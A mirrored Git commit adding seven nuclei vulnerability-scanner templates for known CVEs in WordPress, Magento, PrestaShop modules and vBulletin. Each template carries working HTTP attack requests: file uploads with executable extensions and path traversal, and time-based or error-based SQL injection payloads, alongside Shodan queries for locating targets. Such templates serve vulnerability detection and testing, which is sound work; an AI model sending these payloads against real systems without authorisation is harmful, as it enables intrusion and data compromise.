daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixes and 2023 CvEs

patch-1
mastercho 2024-03-16 19:23:48 +02:00
parent a7257fdadc
commit b32a1f9d7f
7 changed files with 300 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

57
http/cves/2015/CVE-2015-4455.yaml Normal file
View File

@ -0,0 +1,57 @@
id: CVE-2015-4455
info:
name: CVE-2015-4455
author: MaStErChO
severity: critical
description: |
Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2015-4455
- http://packetstormsecurity.com/files/132256/WordPress-Aviary-Image-Editor-Add-On-For-Gravity-Forms-3.0-Beta-Shell-Upload.html
metadata:
framework: wordpress
variables:
filename: '{{rand_base(7, "abc")}}'
http:
- raw:
- |
GET /?gf_page=upload HTTP/1.1
Host: {{Hostname}}
- |
POST /?gf_page=upload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="field_id"
3
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="form_id"
1
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="gform_unique_id"
../../../
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="name"
{{filename}}.phtml
--a54906fe12c504cb01ca836d062f82fa
Content-Disposition: form-data; name="file"; filename="{{filename}}.jpg"
Content-Type: text/html
{{randstr}}
--a54906fe12c504cb01ca836d062f82fa--
matchers:
- type: dsl
dsl:
- 'contains(body_1, "Failed to upload file")'
- 'status_code_2 == 200'
- 'contains(body_2, "uploaded_filename\":\"{{filename}}.jpg")'
condition: and

53
http/cves/2019/CVE-2019-7139.yaml Normal file
View File

@ -0,0 +1,53 @@
id: CVE-2019-7139
info:
name: CVE-2019-7139
author: MaStErChO
severity: high
description: |
The Magento application running on the remote web server is affected by a SQL injection vulnerability due to failing to properly sanitize the user-supplied from and to inputs to the prepareSqlCondition function of the Magento\Framework\DB\Adapter\Pdo\Mysql class. An unauthenticated, remote attacker can exploit this to execute arbitrary SQL statements against the back-end database, leading to the execution of arbitrary code, manipulation of data, or disclosure of sensitive information
reference:
- https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap
- https://www.ambionics.io/blog/magento-sqli
metadata:
framework: magento
tags: sqli,magento
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1
Host: {{Hostname}}
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1
Host: {{Hostname}}
- |
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers-condition: or
matchers:
- type: dsl
name: Blind
dsl:
- 'contains(body_1, "text/x-magento-init")'
- 'status_code_2 == 200'
- 'status_code_3 == 400'
- 'contains(content_type_2, "application/json")'
- 'contains(content_type_3, "application/json")'
- 'len(body_2) == 2'
- 'len(body_3) == 2'
condition: and
- type: dsl
name: Time
dsl:
- 'contains(body_1, "text/x-magento-init")'
- 'duration_4>=6'
- 'contains(content_type_4, "application/json")'
- 'len(body_4) == 2'
condition: and

36
http/cves/2023/CVE-2023-27032.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2023-27032
info:
name: CVE-2023-27032
author: MaStErChO
severity: critical
description: |
In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.
reference:
- https://security.friendsofpresta.org/modules/2023/04/11/advancedpopupcreator.html
metadata:
max-request: 1
framework: prestashop
shodan-query: http.component:"prestashop"
tags: sqli,prestashop,advancedpopupcreator
http:
- raw:
- |
POST /module/advancedpopupcreator/popup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time=1709941392995&token=1946dc43bb8d7cb5fef89588e87479d8
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'
- type: status
status:
- 200
- type: word
part: body
words:
- "popups"

32
http/cves/2023/CVE-2023-45375.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2023-45375
info:
name: CVE-2023-45375
author: MaStErChO
severity: high
description: |
In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.
reference:
- https://security.friendsofpresta.org/modules/2023/10/12/pireospay.html
metadata:
max-request: 1
framework: prestashop
shodan-query: http.component:"prestashop"
tags: sqli,prestashop,pireospay
http:
- raw:
- |
POST /module/pireospay/validation HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'
- type: status
status:
- 302

32
http/cves/2023/CVE-2023-46347.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2023-46347
info:
name: CVE-2023-46347
author: MaStErChO
severity: high
description: |
In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.
reference:
- https://security.friendsofpresta.org/modules/2023/10/24/ndk_steppingpack.html
- https://stack.chaitin.com/poc/detail/3977
metadata:
max-request: 1
framework: prestashop
shodan-query: http.component:"prestashop"
tags: sqli,prestashop,ndk_steppingpack
http:
- raw:
- |
POST /modules/ndk_steppingpack/search-result.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'
- type: status
status:
- 200

53
http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml Normal file
View File

@ -0,0 +1,53 @@
id: prestashop-cartabandonmentpro-file-upload
info:
name: Prestashop Cart Abandonment Pro File Upload
author: MaStErChO
severity: critical
reference:
- https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/
- https://dh42.com/blog/prestashop-security/
metadata:
framework: prestashop
shodan-query: http.component:"prestashop"
tags: intrusive,file-upload,cartabandonmentpro,prestashop
variables:
filename: '{{rand_base(7, "abc")}}'
title: '{{rand_base(7, "abc")}}'
http:
- raw:
- |
POST /modules/{{paths}}/upload.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=xYzZY
--xYzZY
Content-Disposition: form-data; name="image"; filename="{{filename}}.php.png"
Content-Type: image/png
<html>
<!-- {{title}} -->
</html>
--xYzZY--
payloads:
paths:
- 'cartabandonmentpro'
- 'cartabandonmentproOld'
stop-at-first-match: true
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word
words:
- "{{filename}}.php.png"
part: body
- type: dsl
dsl:
- status_code == 200

37
http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml Normal file
View File

@ -0,0 +1,37 @@
id: vbulletin-search-sqli
info:
name: vBulletin Search.php SQL Injection
author: MaStErChO
severity: high
description: |
vBulletin 4 is vulnerable to an SQL injection vulnerability, which may allow an attacker can execute malicious SQL statements that control a web application's database server.
reference:
- https://www.exploit-db.com/exploits/17314
- https://web.archive.org/web/20181129123620/https://j0hnx3r.org/vbulletin-4-x-sql-injection-vulnerability/
tags: vbulletin, ajaxreg, sql-injection
metadata:
max-request: 1
shodan-query: http.component:"vBulletin"
http:
- raw:
- |
POST /search.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
contenttypeid=7&do=process&humanverify=1&cat[]=-1%27
matchers-condition: and
matchers:
- type: word
part: body
words:
- "type=dberror"
- type: status
status:
- 200
- 503
condition: or